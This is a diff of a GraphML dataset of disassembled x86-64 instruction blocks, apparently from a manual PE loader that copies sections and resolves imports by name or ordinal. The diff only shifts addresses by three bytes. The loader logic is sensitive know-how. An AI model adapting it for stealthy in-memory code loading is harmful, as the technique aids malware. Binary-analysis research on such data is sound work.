+          <data key="instruction.source">je 0x1348</data>
         </node>
-        <edge source="block.0x131b:instruction.0x131b" target="block.0x131b:instruction.0x131e"/>
+        <edge source="block.0x131e:instruction.0x131e" target="block.0x131e:instruction.0x1321"/>
       </graph>
     </node>
-    <node id="block.0x1320">
-      <data key="address">0x1320</data>
+    <node id="block.0x1323">
+      <data key="address">0x1323</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1320</data>
+        <data key="address">0x1323</data>
         <data key="type">instructions</data>
-        <node id="block.0x1320:instruction.0x1320">
-          <data key="address">0x1320</data>
+        <node id="block.0x1323:instruction.0x1323">
+          <data key="address">0x1323</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b450c</data>
           <data key="instruction.source">mov eax, dword ptr [r13 + 0xc]</data>
         </node>
-        <node id="block.0x1320:instruction.0x1324">
-          <data key="address">0x1324</data>
+        <node id="block.0x1323:instruction.0x1327">
+          <data key="address">0x1327</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b7dd0</data>
           <data key="instruction.source">mov rdi, qword ptr [rbp - 0x30]</data>
         </node>
-        <node id="block.0x1320:instruction.0x1328">
-          <data key="address">0x1328</data>
+        <node id="block.0x1323:instruction.0x132b">
+          <data key="address">0x132b</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4801c7</data>
           <data key="instruction.source">add rdi, rax</data>
         </node>
-        <node id="block.0x1320:instruction.0x132b">
-          <data key="address">0x132b</data>
+        <node id="block.0x1323:instruction.0x132e">
+          <data key="address">0x132e</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b4514</data>
           <data key="instruction.source">mov eax, dword ptr [r13 + 0x14]</data>
         </node>
-        <node id="block.0x1320:instruction.0x132f">
-          <data key="address">0x132f</data>
+        <node id="block.0x1323:instruction.0x1332">
+          <data key="address">0x1332</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b75d8</data>
           <data key="instruction.source">mov rsi, qword ptr [rbp - 0x28]</data>
         </node>
-        <node id="block.0x1320:instruction.0x1333">
-          <data key="address">0x1333</data>
+        <node id="block.0x1323:instruction.0x1336">
+          <data key="address">0x1336</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4801c6</data>
           <data key="instruction.source">add rsi, rax</data>
         </node>
-        <node id="block.0x1320:instruction.0x1336">
-          <data key="address">0x1336</data>
+        <node id="block.0x1323:instruction.0x1339">
+          <data key="address">0x1339</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b4d10</data>
           <data key="instruction.source">mov ecx, dword ptr [r13 + 0x10]</data>
         </node>
-        <edge source="block.0x1320:instruction.0x1320" target="block.0x1320:instruction.0x1328"/>
-        <edge source="block.0x1320:instruction.0x1320" target="block.0x1320:instruction.0x132b"/>
-        <edge source="block.0x1320:instruction.0x1324" target="block.0x1320:instruction.0x1328"/>
-        <edge source="block.0x1320:instruction.0x1328" target="block.0x1320:instruction.0x132b"/>
-        <edge source="block.0x1320:instruction.0x1328" target="block.0x1320:instruction.0x1333"/>
-        <edge source="block.0x1320:instruction.0x132b" target="block.0x1320:instruction.0x1333"/>
-        <edge source="block.0x1320:instruction.0x132f" target="block.0x1320:instruction.0x1333"/>
+        <edge source="block.0x1323:instruction.0x1323" target="block.0x1323:instruction.0x132b"/>
+        <edge source="block.0x1323:instruction.0x1323" target="block.0x1323:instruction.0x132e"/>
+        <edge source="block.0x1323:instruction.0x1327" target="block.0x1323:instruction.0x132b"/>
+        <edge source="block.0x1323:instruction.0x132b" target="block.0x1323:instruction.0x132e"/>
+        <edge source="block.0x1323:instruction.0x132b" target="block.0x1323:instruction.0x1336"/>
+        <edge source="block.0x1323:instruction.0x132e" target="block.0x1323:instruction.0x1336"/>
+        <edge source="block.0x1323:instruction.0x1332" target="block.0x1323:instruction.0x1336"/>
       </graph>
     </node>
-    <node id="block.0x133a">
-      <data key="address">0x133a</data>
+    <node id="block.0x133d">
+      <data key="address">0x133d</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x133a</data>
+        <data key="address">0x133d</data>
         <data key="type">instructions</data>
-        <node id="block.0x133a:instruction.0x133a">
-          <data key="address">0x133a</data>
+        <node id="block.0x133d:instruction.0x133d">
+          <data key="address">0x133d</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">f3a4</data>
           <data key="instruction.source">rep movsb byte ptr [rdi], byte ptr [rsi]</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x133c">
-      <data key="address">0x133c</data>
+    <node id="block.0x133f">
+      <data key="address">0x133f</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x133c</data>
+        <data key="address">0x133f</data>
         <data key="type">instructions</data>
-        <node id="block.0x133c:instruction.0x133c">
-          <data key="address">0x133c</data>
+        <node id="block.0x133f:instruction.0x133f">
+          <data key="address">0x133f</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4983c528</data>
           <data key="instruction.source">add r13, 0x28</data>
         </node>
-        <node id="block.0x133c:instruction.0x1340">
-          <data key="address">0x1340</data>
+        <node id="block.0x133f:instruction.0x1343">
+          <data key="address">0x1343</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">41ffcf</data>
           <data key="instruction.source">dec r15d</data>
         </node>
-        <node id="block.0x133c:instruction.0x1343">
-          <data key="address">0x1343</data>
+        <node id="block.0x133f:instruction.0x1346">
+          <data key="address">0x1346</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">ebd6</data>
-          <data key="instruction.source">jmp 0x131b</data>
+          <data key="instruction.source">jmp 0x131e</data>
         </node>
-        <edge source="block.0x133c:instruction.0x133c" target="block.0x133c:instruction.0x1340"/>
-        <edge source="block.0x133c:instruction.0x1340" target="block.0x133c:instruction.0x1343"/>
+        <edge source="block.0x133f:instruction.0x133f" target="block.0x133f:instruction.0x1343"/>
+        <edge source="block.0x133f:instruction.0x1343" target="block.0x133f:instruction.0x1346"/>
       </graph>
     </node>
-    <node id="block.0x1345">
-      <data key="address">0x1345</data>
+    <node id="block.0x1348">
+      <data key="address">0x1348</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1345</data>
+        <data key="address">0x1348</data>
         <data key="type">instructions</data>
-        <node id="block.0x1345:instruction.0x1345">
-          <data key="address">0x1345</data>
+        <node id="block.0x1348:instruction.0x1348">
+          <data key="address">0x1348</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b842490000000</data>
           <data key="instruction.source">mov eax, dword ptr [r12 + 0x90]</data>
         </node>
-        <node id="block.0x1345:instruction.0x134d">
-          <data key="address">0x134d</data>
+        <node id="block.0x1348:instruction.0x1350">
+          <data key="address">0x1350</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">85c0</data>
           <data key="instruction.source">test eax, eax</data>
         </node>
-        <node id="block.0x1345:instruction.0x134f">
-          <data key="address">0x134f</data>
+        <node id="block.0x1348:instruction.0x1352">
+          <data key="address">0x1352</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">0f84a5000000</data>
-          <data key="instruction.source">je 0x13fa</data>
+          <data key="instruction.source">je 0x13fd</data>
         </node>
-        <edge source="block.0x1345:instruction.0x1345" target="block.0x1345:instruction.0x134d"/>
-        <edge source="block.0x1345:instruction.0x134d" target="block.0x1345:instruction.0x134f"/>
+        <edge source="block.0x1348:instruction.0x1348" target="block.0x1348:instruction.0x1350"/>
+        <edge source="block.0x1348:instruction.0x1350" target="block.0x1348:instruction.0x1352"/>
       </graph>
     </node>
-    <node id="block.0x1355">
-      <data key="address">0x1355</data>
+    <node id="block.0x1358">
+      <data key="address">0x1358</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1355</data>
+        <data key="address">0x1358</data>
         <data key="type">instructions</data>
-        <node id="block.0x1355:instruction.0x1355">
-          <data key="address">0x1355</data>
+        <node id="block.0x1358:instruction.0x1358">
+          <data key="address">0x1358</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c8b75d0</data>
           <data key="instruction.source">mov r14, qword ptr [rbp - 0x30]</data>
         </node>
-        <node id="block.0x1355:instruction.0x1359">
-          <data key="address">0x1359</data>
+        <node id="block.0x1358:instruction.0x135c">
+          <data key="address">0x135c</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4901c6</data>
           <data key="instruction.source">add r14, rax</data>
         </node>
-        <edge source="block.0x1355:instruction.0x1355" target="block.0x1355:instruction.0x1359"/>
+        <edge source="block.0x1358:instruction.0x1358" target="block.0x1358:instruction.0x135c"/>
       </graph>
     </node>
-    <node id="block.0x135c">
-      <data key="address">0x135c</data>
+    <node id="block.0x135f">
+      <data key="address">0x135f</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x135c</data>
+        <data key="address">0x135f</data>
         <data key="type">instructions</data>
-        <node id="block.0x135c:instruction.0x135c">
-          <data key="address">0x135c</data>
+        <node id="block.0x135f:instruction.0x135f">
+          <data key="address">0x135f</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b460c</data>
           <data key="instruction.source">mov eax, dword ptr [r14 + 0xc]</data>
         </node>
-        <node id="block.0x135c:instruction.0x1360">
-          <data key="address">0x1360</data>
+        <node id="block.0x135f:instruction.0x1363">
+          <data key="address">0x1363</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">85c0</data>
           <data key="instruction.source">test eax, eax</data>
         </node>
-        <node id="block.0x135c:instruction.0x1362">
-          <data key="address">0x1362</data>
+        <node id="block.0x135f:instruction.0x1365">
+          <data key="address">0x1365</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">0f8492000000</data>
-          <data key="instruction.source">je 0x13fa</data>
+          <data key="instruction.source">je 0x13fd</data>
         </node>
-        <edge source="block.0x135c:instruction.0x135c" target="block.0x135c:instruction.0x1360"/>
-        <edge source="block.0x135c:instruction.0x1360" target="block.0x135c:instruction.0x1362"/>
+        <edge source="block.0x135f:instruction.0x135f" target="block.0x135f:instruction.0x1363"/>
+        <edge source="block.0x135f:instruction.0x1363" target="block.0x135f:instruction.0x1365"/>
       </graph>
     </node>
-    <node id="block.0x1368">
-      <data key="address">0x1368</data>
+    <node id="block.0x136b">
+      <data key="address">0x136b</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1368</data>
+        <data key="address">0x136b</data>
         <data key="type">instructions</data>
-        <node id="block.0x1368:instruction.0x1368">
-          <data key="address">0x1368</data>
+        <node id="block.0x136b:instruction.0x136b">
+          <data key="address">0x136b</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b4dd0</data>
           <data key="instruction.source">mov rcx, qword ptr [rbp - 0x30]</data>
         </node>
-        <node id="block.0x1368:instruction.0x136c">
-          <data key="address">0x136c</data>
+        <node id="block.0x136b:instruction.0x136f">
+          <data key="address">0x136f</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4801c1</data>
           <data key="instruction.source">add rcx, rax</data>
         </node>
-        <node id="block.0x1368:instruction.0x136f">
-          <data key="address">0x136f</data>
+        <node id="block.0x136b:instruction.0x1372">
+          <data key="address">0x1372</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4883ec28</data>
           <data key="instruction.source">sub rsp, 0x28</data>
         </node>
-        <node id="block.0x1368:instruction.0x1373">
-          <data key="address">0x1373</data>
+        <node id="block.0x136b:instruction.0x1376">
+          <data key="address">0x1376</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">ff55f8</data>
           <data key="instruction.source">call qword ptr [rbp - 8]</data>
         </node>
-        <edge source="block.0x1368:instruction.0x1368" target="block.0x1368:instruction.0x136c"/>
-        <edge source="block.0x1368:instruction.0x1368" target="block.0x1368:instruction.0x1373"/>
-        <edge source="block.0x1368:instruction.0x136c" target="block.0x1368:instruction.0x136f"/>
-        <edge source="block.0x1368:instruction.0x136f" target="block.0x1368:instruction.0x1373"/>
+        <edge source="block.0x136b:instruction.0x136b" target="block.0x136b:instruction.0x136f"/>
+        <edge source="block.0x136b:instruction.0x136b" target="block.0x136b:instruction.0x1376"/>
+        <edge source="block.0x136b:instruction.0x136f" target="block.0x136b:instruction.0x1372"/>
+        <edge source="block.0x136b:instruction.0x1372" target="block.0x136b:instruction.0x1376"/>
       </graph>
     </node>
-    <node id="block.0x1376">
-      <data key="address">0x1376</data>
+    <node id="block.0x1379">
+      <data key="address">0x1379</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1376</data>
+        <data key="address">0x1379</data>
         <data key="type">instructions</data>
-        <node id="block.0x1376:instruction.0x1376">
-          <data key="address">0x1376</data>
+        <node id="block.0x1379:instruction.0x1379">
+          <data key="address">0x1379</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4883c428</data>
           <data key="instruction.source">add rsp, 0x28</data>
         </node>
-        <node id="block.0x1376:instruction.0x137a">
-          <data key="address">0x137a</data>
+        <node id="block.0x1379:instruction.0x137d">
+          <data key="address">0x137d</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4989c5</data>
           <data key="instruction.source">mov r13, rax</data>
         </node>
-        <node id="block.0x1376:instruction.0x137d">
-          <data key="address">0x137d</data>
+        <node id="block.0x1379:instruction.0x1380">
+          <data key="address">0x1380</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b06</data>
           <data key="instruction.source">mov eax, dword ptr [r14]</data>
         </node>
-        <node id="block.0x1376:instruction.0x1380">
-          <data key="address">0x1380</data>
+        <node id="block.0x1379:instruction.0x1383">
+          <data key="address">0x1383</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">85c0</data>
           <data key="instruction.source">test eax, eax</data>
         </node>
-        <node id="block.0x1376:instruction.0x1382">
-          <data key="address">0x1382</data>
+        <node id="block.0x1379:instruction.0x1385">
+          <data key="address">0x1385</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">7504</data>
-          <data key="instruction.source">jne 0x1388</data>
+          <data key="instruction.source">jne 0x138b</data>
         </node>
-        <edge source="block.0x1376:instruction.0x1376" target="block.0x1376:instruction.0x1380"/>
-        <edge source="block.0x1376:instruction.0x137a" target="block.0x1376:instruction.0x137d"/>
-        <edge source="block.0x1376:instruction.0x137d" target="block.0x1376:instruction.0x1380"/>
-        <edge source="block.0x1376:instruction.0x1380" target="block.0x1376:instruction.0x1382"/>
+        <edge source="block.0x1379:instruction.0x1379" target="block.0x1379:instruction.0x1383"/>
+        <edge source="block.0x1379:instruction.0x137d" target="block.0x1379:instruction.0x1380"/>
+        <edge source="block.0x1379:instruction.0x1380" target="block.0x1379:instruction.0x1383"/>
+        <edge source="block.0x1379:instruction.0x1383" target="block.0x1379:instruction.0x1385"/>
       </graph>
     </node>
-    <node id="block.0x1384">
-      <data key="address">0x1384</data>
+    <node id="block.0x1387">
+      <data key="address">0x1387</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1384</data>
+        <data key="address">0x1387</data>
         <data key="type">instructions</data>
-        <node id="block.0x1384:instruction.0x1384">
-          <data key="address">0x1384</data>
+        <node id="block.0x1387:instruction.0x1387">
+          <data key="address">0x1387</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b4610</data>
           <data key="instruction.source">mov eax, dword ptr [r14 + 0x10]</data>
         </node>
       </graph>
     </node>
-    <node id="block.0x1388">
-      <data key="address">0x1388</data>
+    <node id="block.0x138b">
+      <data key="address">0x138b</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x1388</data>
+        <data key="address">0x138b</data>
         <data key="type">instructions</data>
-        <node id="block.0x1388:instruction.0x1388">
-          <data key="address">0x1388</data>
+        <node id="block.0x138b:instruction.0x138b">
+          <data key="address">0x138b</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b75d0</data>
           <data key="instruction.source">mov rsi, qword ptr [rbp - 0x30]</data>
         </node>
-        <node id="block.0x1388:instruction.0x138c">
-          <data key="address">0x138c</data>
+        <node id="block.0x138b:instruction.0x138f">
+          <data key="address">0x138f</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4801c6</data>
           <data key="instruction.source">add rsi, rax</data>
         </node>
-        <node id="block.0x1388:instruction.0x138f">
-          <data key="address">0x138f</data>
+        <node id="block.0x138b:instruction.0x1392">
+          <data key="address">0x1392</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">418b4610</data>
           <data key="instruction.source">mov eax, dword ptr [r14 + 0x10]</data>
         </node>
-        <node id="block.0x1388:instruction.0x1393">
-          <data key="address">0x1393</data>
+        <node id="block.0x138b:instruction.0x1396">
+          <data key="address">0x1396</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b7dd0</data>
           <data key="instruction.source">mov rdi, qword ptr [rbp - 0x30]</data>
         </node>
-        <node id="block.0x1388:instruction.0x1397">
-          <data key="address">0x1397</data>
+        <node id="block.0x138b:instruction.0x139a">
+          <data key="address">0x139a</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4801c7</data>
           <data key="instruction.source">add rdi, rax</data>
         </node>
-        <edge source="block.0x1388:instruction.0x1388" target="block.0x1388:instruction.0x138c"/>
-        <edge source="block.0x1388:instruction.0x138c" target="block.0x1388:instruction.0x138f"/>
-        <edge source="block.0x1388:instruction.0x138c" target="block.0x1388:instruction.0x1397"/>
-        <edge source="block.0x1388:instruction.0x138f" target="block.0x1388:instruction.0x1397"/>
-        <edge source="block.0x1388:instruction.0x1393" target="block.0x1388:instruction.0x1397"/>
+        <edge source="block.0x138b:instruction.0x138b" target="block.0x138b:instruction.0x138f"/>
+        <edge source="block.0x138b:instruction.0x138f" target="block.0x138b:instruction.0x1392"/>
+        <edge source="block.0x138b:instruction.0x138f" target="block.0x138b:instruction.0x139a"/>
+        <edge source="block.0x138b:instruction.0x1392" target="block.0x138b:instruction.0x139a"/>
+        <edge source="block.0x138b:instruction.0x1396" target="block.0x138b:instruction.0x139a"/>
       </graph>
     </node>
-    <node id="block.0x139a">
-      <data key="address">0x139a</data>
+    <node id="block.0x139d">
+      <data key="address">0x139d</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x139a</data>
+        <data key="address">0x139d</data>
         <data key="type">instructions</data>
-        <node id="block.0x139a:instruction.0x139a">
-          <data key="address">0x139a</data>
+        <node id="block.0x139d:instruction.0x139d">
+          <data key="address">0x139d</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b06</data>
           <data key="instruction.source">mov rax, qword ptr [rsi]</data>
         </node>
-        <node id="block.0x139a:instruction.0x139d">
-          <data key="address">0x139d</data>
+        <node id="block.0x139d:instruction.0x13a0">
+          <data key="address">0x13a0</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4885c0</data>
           <data key="instruction.source">test rax, rax</data>
         </node>
-        <node id="block.0x139a:instruction.0x13a0">
-          <data key="address">0x13a0</data>
+        <node id="block.0x139d:instruction.0x13a3">
+          <data key="address">0x13a3</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">744f</data>
-          <data key="instruction.source">je 0x13f1</data>
+          <data key="instruction.source">je 0x13f4</data>
         </node>
-        <edge source="block.0x139a:instruction.0x139a" target="block.0x139a:instruction.0x139d"/>
-        <edge source="block.0x139a:instruction.0x139d" target="block.0x139a:instruction.0x13a0"/>
+        <edge source="block.0x139d:instruction.0x139d" target="block.0x139d:instruction.0x13a0"/>
+        <edge source="block.0x139d:instruction.0x13a0" target="block.0x139d:instruction.0x13a3"/>
       </graph>
     </node>
-    <node id="block.0x13a2">
-      <data key="address">0x13a2</data>
+    <node id="block.0x13a5">
+      <data key="address">0x13a5</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x13a2</data>
+        <data key="address">0x13a5</data>
         <data key="type">instructions</data>
-        <node id="block.0x13a2:instruction.0x13a2">
-          <data key="address">0x13a2</data>
+        <node id="block.0x13a5:instruction.0x13a5">
+          <data key="address">0x13a5</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">48b90000000000000080</data>
           <data key="instruction.source">movabs rcx, 0x8000000000000000</data>
         </node>
-        <node id="block.0x13a2:instruction.0x13ac">
-          <data key="address">0x13ac</data>
+        <node id="block.0x13a5:instruction.0x13af">
+          <data key="address">0x13af</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4885c8</data>
           <data key="instruction.source">test rax, rcx</data>
         </node>
-        <node id="block.0x13a2:instruction.0x13af">
-          <data key="address">0x13af</data>
+        <node id="block.0x13a5:instruction.0x13b2">
+          <data key="address">0x13b2</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">7521</data>
-          <data key="instruction.source">jne 0x13d2</data>
+          <data key="instruction.source">jne 0x13d5</data>
         </node>
-        <edge source="block.0x13a2:instruction.0x13a2" target="block.0x13a2:instruction.0x13ac"/>
-        <edge source="block.0x13a2:instruction.0x13ac" target="block.0x13a2:instruction.0x13af"/>
+        <edge source="block.0x13a5:instruction.0x13a5" target="block.0x13a5:instruction.0x13af"/>
+        <edge source="block.0x13a5:instruction.0x13af" target="block.0x13a5:instruction.0x13b2"/>
       </graph>
     </node>
-    <node id="block.0x13b1">
-      <data key="address">0x13b1</data>
+    <node id="block.0x13b4">
+      <data key="address">0x13b4</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x13b1</data>
+        <data key="address">0x13b4</data>
         <data key="type">instructions</data>
-        <node id="block.0x13b1:instruction.0x13b1">
-          <data key="address">0x13b1</data>
+        <node id="block.0x13b4:instruction.0x13b4">
+          <data key="address">0x13b4</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488b4dd0</data>
           <data key="instruction.source">mov rcx, qword ptr [rbp - 0x30]</data>
         </node>
-        <node id="block.0x13b1:instruction.0x13b5">
-          <data key="address">0x13b5</data>
+        <node id="block.0x13b4:instruction.0x13b8">
+          <data key="address">0x13b8</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4801c1</data>
           <data key="instruction.source">add rcx, rax</data>
         </node>
-        <node id="block.0x13b1:instruction.0x13b8">
-          <data key="address">0x13b8</data>
+        <node id="block.0x13b4:instruction.0x13bb">
+          <data key="address">0x13bb</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4883c102</data>
           <data key="instruction.source">add rcx, 2</data>
         </node>
-        <node id="block.0x13b1:instruction.0x13bc">
-          <data key="address">0x13bc</data>
+        <node id="block.0x13b4:instruction.0x13bf">
+          <data key="address">0x13bf</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4883ec28</data>
           <data key="instruction.source">sub rsp, 0x28</data>
         </node>
-        <node id="block.0x13b1:instruction.0x13c0">
-          <data key="address">0x13c0</data>
+        <node id="block.0x13b4:instruction.0x13c3">
+          <data key="address">0x13c3</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4889ca</data>
           <data key="instruction.source">mov rdx, rcx</data>
         </node>
-        <node id="block.0x13b1:instruction.0x13c3">
-          <data key="address">0x13c3</data>
+        <node id="block.0x13b4:instruction.0x13c6">
+          <data key="address">0x13c6</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c89e9</data>
           <data key="instruction.source">mov rcx, r13</data>
         </node>
-        <node id="block.0x13b1:instruction.0x13c6">
-          <data key="address">0x13c6</data>
+        <node id="block.0x13b4:instruction.0x13c9">
+          <data key="address">0x13c9</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">ff55f0</data>
           <data key="instruction.source">call qword ptr [rbp - 0x10]</data>
         </node>
-        <edge source="block.0x13b1:instruction.0x13b1" target="block.0x13b1:instruction.0x13b5"/>
-        <edge source="block.0x13b1:instruction.0x13b1" target="block.0x13b1:instruction.0x13c6"/>
-        <edge source="block.0x13b1:instruction.0x13b5" target="block.0x13b1:instruction.0x13b8"/>
-        <edge source="block.0x13b1:instruction.0x13b8" target="block.0x13b1:instruction.0x13bc"/>
-        <edge source="block.0x13b1:instruction.0x13b8" target="block.0x13b1:instruction.0x13c0"/>
-        <edge source="block.0x13b1:instruction.0x13b8" target="block.0x13b1:instruction.0x13c3"/>
-        <edge source="block.0x13b1:instruction.0x13bc" target="block.0x13b1:instruction.0x13c6"/>
-        <edge source="block.0x13b1:instruction.0x13c0" target="block.0x13b1:instruction.0x13c3"/>
-        <edge source="block.0x13b1:instruction.0x13c3" target="block.0x13b1:instruction.0x13c6"/>
+        <edge source="block.0x13b4:instruction.0x13b4" target="block.0x13b4:instruction.0x13b8"/>
+        <edge source="block.0x13b4:instruction.0x13b4" target="block.0x13b4:instruction.0x13c9"/>
+        <edge source="block.0x13b4:instruction.0x13b8" target="block.0x13b4:instruction.0x13bb"/>
+        <edge source="block.0x13b4:instruction.0x13bb" target="block.0x13b4:instruction.0x13bf"/>
+        <edge source="block.0x13b4:instruction.0x13bb" target="block.0x13b4:instruction.0x13c3"/>
+        <edge source="block.0x13b4:instruction.0x13bb" target="block.0x13b4:instruction.0x13c6"/>
+        <edge source="block.0x13b4:instruction.0x13bf" target="block.0x13b4:instruction.0x13c9"/>
+        <edge source="block.0x13b4:instruction.0x13c3" target="block.0x13b4:instruction.0x13c6"/>
+        <edge source="block.0x13b4:instruction.0x13c6" target="block.0x13b4:instruction.0x13c9"/>
       </graph>
     </node>
-    <node id="block.0x13c9">
-      <data key="address">0x13c9</data>
+    <node id="block.0x13cc">
+      <data key="address">0x13cc</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x13c9</data>
+        <data key="address">0x13cc</data>
         <data key="type">instructions</data>
-        <node id="block.0x13c9:instruction.0x13c9">
-          <data key="address">0x13c9</data>
+        <node id="block.0x13cc:instruction.0x13cc">
+          <data key="address">0x13cc</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4883c428</data>
           <data key="instruction.source">add rsp, 0x28</data>
         </node>
-        <node id="block.0x13c9:instruction.0x13cd">
-          <data key="address">0x13cd</data>
+        <node id="block.0x13cc:instruction.0x13d0">
+          <data key="address">0x13d0</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488907</data>
           <data key="instruction.source">mov qword ptr [rdi], rax</data>
         </node>
-        <node id="block.0x13c9:instruction.0x13d0">
-          <data key="address">0x13d0</data>
+        <node id="block.0x13cc:instruction.0x13d3">
+          <data key="address">0x13d3</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">eb15</data>
-          <data key="instruction.source">jmp 0x13e7</data>
+          <data key="instruction.source">jmp 0x13ea</data>
         </node>
-        <edge source="block.0x13c9:instruction.0x13c9" target="block.0x13c9:instruction.0x13d0"/>
-        <edge source="block.0x13c9:instruction.0x13cd" target="block.0x13c9:instruction.0x13d0"/>
+        <edge source="block.0x13cc:instruction.0x13cc" target="block.0x13cc:instruction.0x13d3"/>
+        <edge source="block.0x13cc:instruction.0x13d0" target="block.0x13cc:instruction.0x13d3"/>
       </graph>
     </node>
-    <node id="block.0x13d2">
-      <data key="address">0x13d2</data>
+    <node id="block.0x13d5">
+      <data key="address">0x13d5</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x13d2</data>
+        <data key="address">0x13d5</data>
         <data key="type">instructions</data>
-        <node id="block.0x13d2:instruction.0x13d2">
-          <data key="address">0x13d2</data>
+        <node id="block.0x13d5:instruction.0x13d5">
+          <data key="address">0x13d5</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">480fb716</data>
           <data key="instruction.source">movzx rdx, word ptr [rsi]</data>
         </node>
-        <node id="block.0x13d2:instruction.0x13d6">
-          <data key="address">0x13d6</data>
+        <node id="block.0x13d5:instruction.0x13d9">
+          <data key="address">0x13d9</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4883ec28</data>
           <data key="instruction.source">sub rsp, 0x28</data>
         </node>
-        <node id="block.0x13d2:instruction.0x13da">
-          <data key="address">0x13da</data>
+        <node id="block.0x13d5:instruction.0x13dd">
+          <data key="address">0x13dd</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4c89e9</data>
           <data key="instruction.source">mov rcx, r13</data>
         </node>
-        <node id="block.0x13d2:instruction.0x13dd">
-          <data key="address">0x13dd</data>
+        <node id="block.0x13d5:instruction.0x13e0">
+          <data key="address">0x13e0</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">ff55f0</data>
           <data key="instruction.source">call qword ptr [rbp - 0x10]</data>
         </node>
-        <edge source="block.0x13d2:instruction.0x13d2" target="block.0x13d2:instruction.0x13dd"/>
-        <edge source="block.0x13d2:instruction.0x13d6" target="block.0x13d2:instruction.0x13dd"/>
-        <edge source="block.0x13d2:instruction.0x13da" target="block.0x13d2:instruction.0x13dd"/>
+        <edge source="block.0x13d5:instruction.0x13d5" target="block.0x13d5:instruction.0x13e0"/>
+        <edge source="block.0x13d5:instruction.0x13d9" target="block.0x13d5:instruction.0x13e0"/>
+        <edge source="block.0x13d5:instruction.0x13dd" target="block.0x13d5:instruction.0x13e0"/>
       </graph>
     </node>
-    <node id="block.0x13e0">
-      <data key="address">0x13e0</data>
+    <node id="block.0x13e3">
+      <data key="address">0x13e3</data>
       <data key="type">instructions-graph</data>
       <graph edgedefault="directed">
-        <data key="address">0x13e0</data>
+        <data key="address">0x13e3</data>
         <data key="type">instructions</data>
-        <node id="block.0x13e0:instruction.0x13e0">
-          <data key="address">0x13e0</data>
+        <node id="block.0x13e3:instruction.0x13e3">
+          <data key="address">0x13e3</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">4883c428</data>
           <data key="instruction.source">add rsp, 0x28</data>
         </node>
-        <node id="block.0x13e0:instruction.0x13e4">
-          <data key="address">0x13e4</data>
+        <node id="block.0x13e3:instruction.0x13e7">
+          <data key="address">0x13e7</data>
           <data key="type">instruction</data>
           <data key="instruction.hex">488907</data>
           <data key="instruction.source">mov qword ptr [rdi], rax</data>
         </node>
       </graph>
     </node>
